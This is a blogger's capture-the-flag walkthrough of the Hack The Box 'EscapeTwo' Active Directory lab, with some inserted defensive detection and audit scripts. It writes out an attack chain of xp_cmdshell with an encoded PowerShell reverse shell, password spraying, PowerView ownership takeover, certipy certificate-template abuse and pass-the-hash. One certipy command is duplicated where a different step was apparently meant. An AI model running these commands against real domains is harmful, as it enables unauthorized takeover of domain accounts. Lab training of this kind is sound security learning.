A while ago, I did a writeup on Cicada. In this post, I’ll share my thought process and what I’ve learned solving EscapeTwo.
EscapeTwo is the second box in the Attacking Active Directory Track on Hack The Box. So, it’s only natural that I stick with that theme.
Enumeration
Scanning
Every enumeration starts with nmap. I let a full ports version + default script scan run in the background:
sudo nmap -Pn -n -p- -sVC escapetwo.htb -oA tcp_all_ports
Then I run a fast scan (top 100 ports) to get results more immediately so I don’t have to wait:
sudo nmap -Pn -n -F -sVC escapetwo.htb -oA quick_version
From the scans, it’s pretty apparent that this is a domain controller:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-01 01:07:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
Kerberos and LDAP are common services to find on a domain controller (DC). It’s also not uncommon for DCs to act as a DNS server.
And it includes DC01 in its domain name. That confirms things!
I updated my /etc/hosts to reflect the DNS findings, so in the following commands you’ll see sequel.htb in place of escapetwo.htb.
It’s also worth noting that a MS SQL Server is hosted on this box:
1443/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
SMB is open on its default 139 port. That’s a good place to start because it means we can enumerate shares and users.
For this, I used nxc with the credentials provided in the lab overview:
nxc smb sequel.htb -u rose -p KxEPkKe6R8su --shares --users | tee nxc_smb_shares_users.out
I like this tool because it quickly lists what level of access I have across the different shares. And it looks like I have read access to the Accounting Department share as rose.
I’ll use smbclient to log in and take a look:
smbclient -U rose -P KxEPkKe6R8su //escapetwo.htb/Accounting\ Department/
I grabbed a suspiciously named accounts.xlsx file and tried to open it with LibreOffice Calc, but it’s corrupted…
Here’s what I did that, in hindsight, wasn’t very smart: I repaired the file with unzip’s -FF option and dug through the extracted XML files.
I eventually came across a sharedStrings.xml file that contained credentials, including one for what looks like a service account user, sa. Judging by the password, it’s very likely the service account for MSSQL.
I later found out that I could have repaired the magic bytes of the Excel accounts file. Then I could have opened it in LibreOffice Calc like a sane person…
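The magic-bytes repair mentioned above, as an added example that is not part of the original post: an .xlsx is a ZIP archive, so restoring the local-header signature is often enough for a spreadsheet tool to open it. The workbook and its strings are constructed placeholders, not the file from the share.

```python
import io
import re
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"  # signature every ZIP (and so every .xlsx) starts with

def build_corrupted_sample() -> bytes:
    """Constructed stand-in for the damaged accounts.xlsx: a tiny workbook archive
    whose first four bytes have been clobbered. The strings are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr(
            "xl/sharedStrings.xml",
            '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
            "<si><t>Username</t></si><si><t>jdoe</t></si>"
            "<si><t>Password</t></si><si><t>placeholder-not-real</t></si></sst>",
        )
    data = bytearray(buf.getvalue())
    data[:4] = b"\x00\x00\x00\x00"  # damage the magic bytes of the first local header
    return bytes(data)

def repair_magic_bytes(data: bytes) -> bytes:
    """Restore the ZIP local-header signature when the first bytes are damaged.
    Only the signature is touched; the rest of the archive is left as-is."""
    if data[:4] == ZIP_LOCAL_HEADER:
        return data
    return ZIP_LOCAL_HEADER + data[4:]

def is_readable_zip(data: bytes) -> bool:
    """True if every member can be extracted. The central directory at the end of
    the file may be intact while a damaged local header breaks the first member."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                zf.read(name)
        return True
    except zipfile.BadZipFile:
        return False

def shared_strings(data: bytes) -> list[str]:
    """Return the text of every shared string in the (repaired) workbook."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        xml = zf.read("xl/sharedStrings.xml").decode()
    return re.findall(r"<t[^>]*>(.*?)</t>", xml)
```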
Initial Access
We have creds to try out, and the road obviously leads to SQL (although it’s good practice to try all of the creds against all of the services).
I used Impacket’s mssqlclient script to log in:
impacket-mssqlclient **@****el.htb
There wasn’t much to go off of here in terms of databases, but I am able to run commands with xp_cmdshell. It’s also worth noting that with xp_dirtree I can see a directory called SQL2019 in the current working directory.
I can run commands by first running enable_xp_cmdshell and then running xp_cmdshell <cmd>. But I’d prefer something more interactive.
So, I’ll set up a listener on my attacker host with nc:
nc -nlvp 4444
Then I’ll run a command to send a reverse connection back. I used this awesome resource to generate a base64-encoded PowerShell payload:
xp_cmdshell "powershell -e <base64-encoded payload>"
And I got a connection back!
Pivot
Now that I have the freedom to move through the file system, I can find more information. I checked the User directory to see if I had access to a user flag.
I didn’t, but I did make note of a user’s home directory called ryan. This aligns with output from the earlier SMB enumeration with nxc:
SMB 10.129.13.88 445 DC01 ryan
This is likely the user account I need to target.
I revisited the SQL2019 directory from earlier. It has config files for the MS SQL service. Inside, the file sql-Configuration.INI has the credentials I used earlier plus a new password for what looks like a service account.
This would be worth spraying to see if anyone is reusing this password. I gathered the usernames listed in the accounts.xlsx file and used nxc to spray SMB:
nxc smb sequel.htb -u users.txt -p <svc passwd>
Surprise, surprise… the password worked with ryan.
From my earlier all-ports scan, I know that WinRM is accessible:
5985/tcp open wsman
So I can use evil-winrm to get a shell as ryan:
evil-winrm -i sequel.htb -u ryan
And I have a nice stable shell. I’m now free to grab the user flag.
PrivEsc
It’s time to find a path to Domain Admin. To do this, I can use BloodHound to map out a path.
But first, I need data. I can upload the SharpHound ingestor to collect it for me:
*Evil-WinRM* PS C:\Users\ryan> upload SharpHound.exe
*Evil-WinRM* PS C:\Users\ryan> ./SharpHound.exe -c All
*Evil-WinRM* PS C:\Users\ryan> download 20260403063505_BloodHound.zip
I love how easy evil-winrm makes file transfers.
I uploaded the zip into BloodHound for examination. There was no apparent path from ryan to domain admin.
But examining the ryan user node reveals that the account has Write Owner permissions over the ca_svc user, which means ryan can take ownership of that user object.
The ca_svc user is a member of Cert Publishers, which grants the privileges necessary to publish certificates.
With this information, I can potentially:
- Change the password of the ca_svc user
- Use the ca_svc account to modify a certificate template so that I can authenticate as any user
To exploit the Write Owner permission and take over the ca_svc account, I can upload PowerView.ps1 and run the following commands:
Import-Module ./PowerView.ps1
Set-DomainObjectOwner -Identity 'ca_svc' -OwnerIdentity 'ryan'
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ca_svc" -PrincipalIdentity "ryan"
$securePassword = ConvertTo-SecureString "Test1234$" -AsPlainText -Force
Set-DomainUserPassword -Identity ca_svc -AccountPassword $securePassword
It’s best to have these commands in a script file and then run that file. I did end up having to reset the password for ca_svc a few times because it would sometimes reset itself.
I can use the trusty nxc command to verify this worked:
nxc smb escapetwo.htb -u ca_svc -p 'Test1234$'
SMB 10.129.232.128 445 DC01 [+] sequel.htb\ca_svc:Test1234$
Noice.
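From the blue-team side, the takeover above leaves a recognisable trail: a security-descriptor change on the ca_svc object followed shortly by a password reset, both performed by the same non-admin principal. This added example (not from the original post) correlates constructed, simplified records modelled on Security events 5136 (directory object modified) and 4724 (password reset attempted); the field names, accounts and allow-lists are assumptions, not real telemetry.

```python
from datetime import datetime, timedelta

# Constructed, simplified Security-log records (not real telemetry). Fields follow
# events 5136 and 4724 loosely; a real pipeline would parse EVTX/XML instead.
EVENTS = [
    {"t": "2026-04-03T06:40:10", "id": 5136, "subject": "ryan",
     "target": "ca_svc", "attr": "nTSecurityDescriptor"},
    {"t": "2026-04-03T06:40:12", "id": 5136, "subject": "ryan",
     "target": "ca_svc", "attr": "nTSecurityDescriptor"},
    {"t": "2026-04-03T06:41:05", "id": 4724, "subject": "ryan",
     "target": "ca_svc", "attr": None},
    {"t": "2026-04-03T09:15:00", "id": 4724, "subject": "helpdesk01",
     "target": "jdoe", "attr": None},  # routine reset, should not alert
]

# Assumed policy: these accounts are only ever reset by designated principals
SERVICE_ACCOUNTS = {"ca_svc", "sql_svc"}
AUTHORIZED_RESETTERS = {"helpdesk01", "administrator"}
WINDOW = timedelta(minutes=30)  # how far back to look for the ACL change

def _ts(event: dict) -> datetime:
    return datetime.fromisoformat(event["t"])

def find_acl_then_reset(events: list) -> list:
    """Flag a password reset of a service account by an unauthorized principal
    that follows a security-descriptor change on that object by the same principal."""
    alerts = []
    sd_changes = [e for e in events
                  if e["id"] == 5136 and e["attr"] == "nTSecurityDescriptor"]
    for e in events:
        if e["id"] != 4724 or e["target"] not in SERVICE_ACCOUNTS:
            continue
        if e["subject"] in AUTHORIZED_RESETTERS:
            continue
        prior = [c for c in sd_changes
                 if c["target"] == e["target"] and c["subject"] == e["subject"]
                 and timedelta(0) <= _ts(e) - _ts(c) <= WINDOW]
        if prior:
            alerts.append({"subject": e["subject"], "target": e["target"],
                           "reset_at": e["t"], "acl_changes": len(prior)})
    return alerts
```

An unauthorized reset without a preceding ACL change is still worth a lower-severity alert; this function only surfaces the chained pattern.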
Now I can enumerate the existing certificate templates with certipy:
certipy find -u 'ca****@****el.htb' -p 'Test1234$' -dc-ip 10.129.15.16 -vulnerable -enabled -stdout
There’s a template called DunderMifflinAuthentication (love the Office theme here) that is vulnerable to ESC4. This means that with the current privileges of the ca_svc account, I can modify the template. And since this seems to be a certificate template for authentication, I can use it as a vector to log in as Administrator.
I can again use certipy to modify the template:
certipy template -u 'ca****@****el.htb' -p 'Test1234$' -template DunderMifflinAuthentication -target dc01.sequel.htb -target-ip 10.129.15.16 -write-default-configuration
The above command modifies the DunderMifflinAuthentication template to make it vulnerable to ESC1. With the modified template, I now have control over the Subject Alternative Name of the requested certificate, which is what I need to request a certificate for authenticating as the Administrator account:
certipy template -u 'ca****@****el.htb' -p 'Test1234$' -template DunderMifflinAuthentication -target dc01.sequel.htb -target-ip 10.129.15.16 -write-default-configuration
Note: I did have to specify the target and target-ip arguments here to avoid DNS errors I was getting with the tool, because it kept trying to resolve dc01.sequel.htb even though I had it specified in /etc/hosts.
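The ESC4-to-ESC1 step above works because a template that lets the requester supply the subject, needs no manager approval or co-signature, and carries an authentication EKU can be used to get a certificate for any principal. As an added example (not from the original post or from certipy), here is a small audit that evaluates those conditions on template attributes; the two template attribute sets are constructed to illustrate a locked-down state versus an ESC1 state, and the constants are the publicly documented AD CS values.

```python
# Publicly documented AD CS constants (not taken from the page)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag: manager approval
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Constructed template attribute sets; names mirror LDAP attributes of
# pKICertificateTemplate objects, values are illustrative only.
TEMPLATES = {
    "DunderMifflinAuthentication-hardened": {
        "msPKI-Certificate-Name-Flag": 0x00000000,  # subject built by the CA from AD
        "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    },
    "DunderMifflinAuthentication-esc1": {
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0x00000000,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    },
}

def esc1_findings(tmpl: dict) -> list:
    """Return the ESC1 conditions a template satisfies; non-empty only when all four
    hold. Who may enroll is a separate check against the template's ACL."""
    reasons = []
    if tmpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("requester controls the subject / SAN")
    if not tmpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("no manager approval")
    if tmpl.get("msPKI-RA-Signature", 0) == 0:
        reasons.append("no authorized signature required")
    ekus = set(tmpl.get("pKIExtendedKeyUsage", []))
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list means any purpose
        reasons.append("usable for client authentication")
    return reasons if len(reasons) == 4 else []

def audit(templates: dict) -> dict:
    """Map template name to its ESC1 reasons, for the templates that are flagged."""
    return {name: r for name, t in templates.items() if (r := esc1_findings(t))}
```

Monitoring the same attributes for change (the CA logs template updates as events 4899 and 4900) catches the moment a previously clean template drifts into this state.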
Now that I have a valid certificate for the Administrator account, I can retrieve the account’s hash:
certipy auth -pfx administrator.pfx -dc-ip 10.129.15.16
I can again revisit evil-winrm for a Pass-the-Hash attack to log in as the Administrator:
evil-winrm -i sequel.htb -u ad***********@****el.htb --hash <hash>
And then all that’s left is to grab the flag!
Conclusion
This lab was an excellent example of Active Directory exploitation.
Having to use BloodHound for enumeration and Certificate Template exploitation to get admin access made it feel very realistic!
As I continue refreshing my skills through the Active Directory Enumeration & Attacks module on HTB, I’ll hack more boxes on the Attacking Active Directory Track to practice. So look out for more posts from me!
I highly recommend this module + practice track if you haven’t explored it already. I’m learning so much 🙂
Happy hacking!